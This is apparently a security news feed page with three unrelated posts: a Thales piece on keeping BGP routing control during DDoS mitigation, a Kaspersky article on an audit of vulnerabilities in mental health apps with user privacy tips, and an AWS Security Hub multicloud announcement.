So, the real question isn’t whether to use cloud‑based DDoS protection. It’s whether that protection operates with your routing policy, or instead of it.

Resilient architectures treat attack mitigation and traffic control as separate concerns. Providers absorb DDoS attacks. Customers retain routing authority using BGP, enabling them to decide how traffic flows during failures.

When customers control BGP, outages take on a different character. They become routing events, not service outages. Traffic can be redirected faster, the blast radius is reduced, and network teams respond using familiar controls instead of escalation paths.


Designing for the inevitable

No provider is immune to failure. CDNs, hyperscalers, and DDoS mitigation services all operate complex, global control planes.

Resilience doesn’t come from assuming outages won’t happen. It comes from designing so that when they do, customers still control the outcome.

That’s why more organizations are adopting architectures where:

  • DDoS protection is cloud‑delivered
  • Routing authority remains customer‑owned
  • BGP is the final decision layer for traffic steering

This approach preserves the benefits of cloud‑scale mitigation while avoiding the creation of new single points of failure.

A practical next step

If you’re rethinking your DDoS architecture, your best starting point isn’t a product demo; it’s an architectural review. Here are some questions to ask yourself:

  • Who originates your prefixes today?
  • How quickly can you reroute traffic if a provider is unavailable?
  • What dependencies exist between mitigation availability and network availability?

Those answers usually reveal more than any outage postmortem.

On the Internet, control of routing is control of availability, and we think that control should always remain in customer’s hands.

Want to discuss what customer‑controlled DDoS protection looks like in practice? Get in touch with Thales to review your architecture.

The post When your DDoS mitigation provider goes down: Why traffic control can’t be outsourced appeared first on Blog.

  •  

Mental health apps are leaking your private thoughts. How do you protect yourself? | Kaspersky official blog

In February 2026, the cybersecurity firm Oversecured published a report that makes you want to factory reset your phone and move into a remote cabin in the woods. Researchers audited 10 popular Android mental health apps — ranging from mood trackers and AI therapists to tools for managing depression and anxiety — and uncovered… 1575 vulnerabilities! Fifty-four of those flaws were classified as critical. Given the download stats on Google Play, as many as 15 million people could be affected. The real kicker? Six out of the ten apps tested explicitly promised users that their data was “fully encrypted and securely protected”.

We’re breaking down this scandalous “brain drain”: what exactly could leak, how it’s happening, and why “anonymity” in these services is usually just a marketing myth.

What was found in the apps

Oversecured is a mobile app security firm that uses a specialized scanner to analyze APK files for known vulnerability patterns across dozens of categories. In January 2026, researchers ran ten mental health monitoring apps from Google Play through the scanner — and the results were, shall we say, “spectacular”.

App Type Installs Security vulnerabilities
High-severity Medium-severity Low-severity Total
Mood & habit tracker 10M+ 1 147 189 337
AI therapy chatbot 1M+ 23 63 169 255
AI emotional health platform 1M+ 13 124 78 215
Health & symptom tracker 500k+ 7 31 173 211
Depression management tool 100k+ 0 66 91 157
CBT-based anxiety app 500k+ 3 45 62 110
Online therapy & support community 1M+ 7 20 71 98
Anxiety & phobia self-help 50k+ 0 15 54 69
Military stress management 50k+ 0 12 50 62
AI CBT chatbot 500k+ 0 15 46 61
Total 14.7М+ 54 538 983 1575

Vulnerabilities found in the 10 tested mental health apps. Source

The anatomy of the flaws

The discovered vulnerabilities are diverse, but they all boil down to one thing: giving attackers access to data that should be under lock and key.

For starters, one of the vulnerabilities allows an attacker to access any internal activity of the app — even that never intended for external eyes. This opens the door to hijacking authentication tokens and user session data. Once an attacker has those, they essentially could gain access to a user’s therapy records.

Another issue is insecure local data storage with read permissions granted to any other app on the device. In other words, that random flashlight app or calculator on your smartphone could potentially read your cognitive behavioral therapy (CBT) logs, personal notes, and mood assessments.

The researchers also found unencrypted configuration data baked right into the APK installation files. This included backend API endpoints and hardcoded URLs for Firebase databases.

Furthermore, several apps were caught using the cryptographically weak java.util.Random class to generate session tokens and encryption keys.

Finally, most of the tested apps lacked root/jailbreak detection. On a rooted device, any third-party app with root privileges could gain total access to every bit of locally stored medical data.

Shockingly, of the 10 apps analyzed, only four received updates in February 2026. The rest haven’t seen a patch since November 2025, and one hasn’t been touched since September 2024. Going 18 months without a security patch is a lifetime in this industry — especially for an app housing mood journals, therapy transcripts, and medication schedules.

Here’s a quick reminder of just how dangerous the misuse of this type of data gets. In 2024, the tech world was rocked by a sophisticated attack on XZ Utils, a critical component found in virtually every operating system based on the Linux kernel. The attacker successfully pressured the maintainer into handing over code commit permissions by exploiting the developer’s public admission of burnout and a lack of motivation to carry on with the project. Had the attack been completed, the damage would have been mind-boggling given that roughly 80% of the world’s servers run on Linux.

What could leak?

What do these apps collect and store? It’s the kind of stuff you’d likely only share with a trusted clinician: therapy session transcripts, mood logs, medication schedules, self-harm indicators, CBT notes, and various clinical assessment scales.

As far back as 2021, complete medical records were selling on the dark web for US$1000 each. For comparison, a stolen credit card number goes for anywhere between US$5 and US$30. Medical records contain a full identity package: name, address, insurance details, and diagnostic history. Unlike a credit card, you can’t exactly “reissue” your medical history. Furthermore, medical fraud is notoriously difficult to spot. While a bank might flag a suspicious transaction in hours, a fraudulent insurance claim for a phantom treatment can go unnoticed for years.

We’ve seen this movie before

The Oversecured study isn’t just an isolated horror story.

Back in 2020, Julius Kivimäki hacked the database of the Finnish psychotherapy clinic Vastaamo, making off with the records of 33 000 patients. When the clinic refused to cough up a €400 000 ransom, Kivimäki began sending direct threats to patients: “Pay €200 in Bitcoin within 24 hours, or else your records go public”. Ultimately, he leaked the entire database onto the dark web anyway. At least two people died by suicide, and the clinic was forced into bankruptcy. Kivimäki was eventually sentenced to six years and three months in prison, marking a record-breaking trial in Finland for the sheer number of victims involved.

In 2023, the U.S. Federal Trade Commission (FTC) slapped the online therapy giant BetterHelp with a US$7.8 million fine. Despite stating on their sign-up page that your data was strictly confidential, the company was caught funneling user info — including mental health questionnaire responses, emails, and IP addresses — to Facebook, Snapchat, Criteo, and Pinterest for targeted advertising. After the dust settled, 800 000 affected users received a grand total of… US$10 each in compensation.

By 2024, the FTC set its sights on the telehealth firm Cerebral, tagging them with a US$7 million fine. Through tracking pixels, Cerebral leaked the data of 3.2 million users to LinkedIn, Snapchat, and TikTok. The haul included names, medical histories, prescriptions, appointment dates, and insurance info. And the cherry on top? The company sent promotional postcards (sans envelopes) to 6000 patients, which effectively broadcasted that the recipients were undergoing psychiatric treatment.

In September 2024, security researcher Jeremiah Fowler stumbled upon an exposed database belonging to Confidant Health, a provider specializing in addiction recovery and mental health services. The database contained audio and video recordings of therapy sessions, transcripts, psychiatric notes, drug test results, and even copies of driver’s licenses. In total, 5.3 terabytes of data, 126 000 files, or 1.7 million records were sitting there without a password.

Why anonymity is an illusion

Developers love to drop the line: “We never share your personal data with anyone.” Technically, that might be true — instead, they share “anonymized profiles”. The catch? De-anonymizing that data isn’t exactly rocket science anymore. Recent research highlights that using LLMs to strip away anonymity has become a routine reality.

Even the “anonymization” process itself is often a mess. A study by Duke University revealed that data brokers are openly hawking the mental health data of Americans. Out of 37 brokers surveyed, 11 agreed to sell data linked to specific diagnoses (like depression, anxiety, and bipolar disorder), demographic parameters, and in some cases, even names and home addresses. Prices started as low as US$275 for 5000 aggregated records.

According to the Mozilla Foundation, by 2023, 59% of popular mental health apps failed to meet even the most basic privacy standards, and 40% had actually become less secure than the previous year. These apps allowed account creation via third-party services (like Google, Apple, and Facebook), featured suspiciously brief privacy policies that glossed over data collection details, and employed a clever little loophole: some privacy policies applied strictly to the company’s website, but not the app itself. In short, your clicks on the site were “protected”, but your actions within the app were fair game.

How to protect yourself

Cutting these apps out of your life entirely is, of course, the most foolproof option — but it’s not the most realistic one. Besides, there’s no guarantee you can actually nuke the data already collected — even if you delete your account. We previously covered the grueling process of scrubbing your info from data broker databases; it’s possible, but prepare for a headache. So, how can you stay safe?

  • Check permissions before you hit “Install”. In Google Play, navigate to App description → About this app → Permissions. A mood tracker has no business asking for access to your camera, microphone, contacts, or precise GPS location. If it does, it’s not looking out for your well-being — it’s harvesting data.
  • Actually read the privacy policy. We get it — nobody reads these multi-page manifestos. But when a service is vacuuming up your most intimate thoughts, it’s worth a skim. Look for the red flags: does the company share data with third parties? Can you manually delete your records? Does the policy explicitly cover the app itself, or just the website? You can always feed the policy text into an AI and ask it to flag any privacy deal-breakers.
  • Check the last updated date. An app that hasn’t seen an update in over six months is likely a playground for unpatched vulnerabilities. Remember: six out of the 10 apps Oversecured tested hadn’t been touched in months.
  • Disable everything non-essential in your phone’s privacy settings. Whenever prompted, always select “ask not to track”. When an app pleads with you to enable a specific type of tracking — claiming it’s for “internal optimization” — it’s almost always a marketing ploy rather than a functional necessity. After all, if the app truly won’t work without a certain permission, you can always go back and toggle it on later.
  • Don’t use “Sign in with…” services. Authenticating via Facebook, Apple, Google, or Microsoft creates additional identifiers and gives companies a golden opportunity to link your data across different platforms.
  • Treat everything you type like a public social media post. If you wouldn’t want a random stranger on the internet reading it, you probably shouldn’t be typing it into an app with over 150 vulnerabilities that hasn’t seen a patch since the year before last.

What else you should know about privacy settings and controlling your personal data online:

  •  

AWS Security Hub is expanding to unify security operations across multicloud environments

After talking with many customers, one thing is clear: the security challenge has not gotten easier. Enterprises today operate across a complex mix of environments, including on-premises infrastructure, private data centers, and multiple clouds, often with tools that were never designed to work together. The result is enterprise security teams spend more time managing tools than managing risk, making it harder to stay ahead of threats across an increasingly complex environment.

At Amazon Web Service (AWS), we believe security should be simple, integrated, and built for the way enterprises actually operate. This belief is what drove us to reimagine AWS Security Hub, delivering full-stack security through a single experience, and this vision is driving our next chapter.

Building on a foundation of unified security

We transformed Security Hub into a unified security operations solution by bringing together AWS security services, including Amazon GuardDuty, Amazon Inspector, AWS Security Hub Cloud Security Posture Management (Security Hub CSPM), and Amazon Macie, into a single experience that automatically and continuously analyzes security signals across threats, vulnerabilities, misconfigurations, and sensitive data. Security Hub delivers a common foundation, bringing together findings from across your AWS environment so your security team spends less time translating signals and more time acting on them. Built on top of that foundation, a unified operations layer gives security teams near real-time risk analytics, automated analysis, and prioritized insights, helping them focus on what matters most, at scale.

We also introduced new capabilities (the Extended plan) that simplify how enterprises procure, deploy, and integrate a full-stack security solution across endpoint, identity, email, network, data, browser, cloud, AI, and security operations. Now, customers can use Security Hub to expand their security portfolio through a curated selection of AWS Partner solutions (at launch: 7AI, Britive, CrowdStrike, Cyera, Island, Noma, Okta, Oligo, Opti, Proofpoint, SailPoint, Splunk (a Cisco company), Upwind, and Zscaler), all through one unified experience. With AWS as the seller of record, you benefit from pay-as-you-go pricing, a single bill, and no long-term commitments. Our goal is simple: unified security, everywhere your enterprise operates.

Freedom to innovate, wherever your workloads are

At AWS, interoperability means giving customers the freedom to choose solutions that best suit their needs, and the ability to use them wherever their workloads run. But freedom to innovate across multicloud environments also means that it is critical to secure them consistently, and without adding operational complexity.

What’s coming for Security Hub

In the coming months, we are expanding Security Hub with new multicloud capabilities that extend unified security operations beyond AWS. The foundation of this expansion is a common data layer that unifies security signals from wherever your workloads run. On top of that, a unified policy and operations layer delivers consistent posture management, exposure analysis, and risk prioritization, so your security team operates from a single view of risk rather than a fragmented collection of consoles.

Security Hub will deliver unified risk analytics that surface critical risks across your multicloud estate. You’ll be able to manage cloud security posture with Security Hub CSPM checks that give you consistent posture visibility, and extend vulnerability management with expanded Amazon Inspector capabilities, including virtual machine scanning, container image scanning, and serverless scanning. Security Hub will also deliver external network scanning that enriches security findings with context about internet-facing exposure across your multicloud environment, including for resources not running in AWS.

The result is more comprehensive risk coverage across your enterprise. It’s about giving your security team a single, unified experience to detect and respond to risks, wherever you operate.

Security as a business enabler

The security leaders I speak with aren’t just asking for better tools. They’re asking for a way to get ahead of risk, not just manage it. They want security that keeps pace with the business, not security that slows it down.

That’s the vision behind AWS Security Hub: unified security through a single, integrated security operations experience, built on a common data foundation, powered by intelligent analytics, and delivered through a consistent operations layer, to help reduce security risk, improve team productivity, and strengthen security operations across AWS and beyond.

Our multicloud expansion is underway, and we are just getting started.

You can learn more at aws.amazon.com/security-hub, or visit us at the AWS booth (S-0466) at RSA Conference, March 23–26 in San Francisco.

Gee Rittenhouse Gee Rittenhouse
Gee is the Vice President of Security Services at AWS, overseeing key services including Security Hub, GuardDuty, and Inspector. He holds a PhD from MIT and brings extensive leadership experience across enterprise security and cloud. He previously served as CEO of Skyhigh Security and Senior Vice President and General Manager of Cisco’s Security Business Group, where he was responsible for Cisco’s worldwide cybersecurity business.
  •  
❌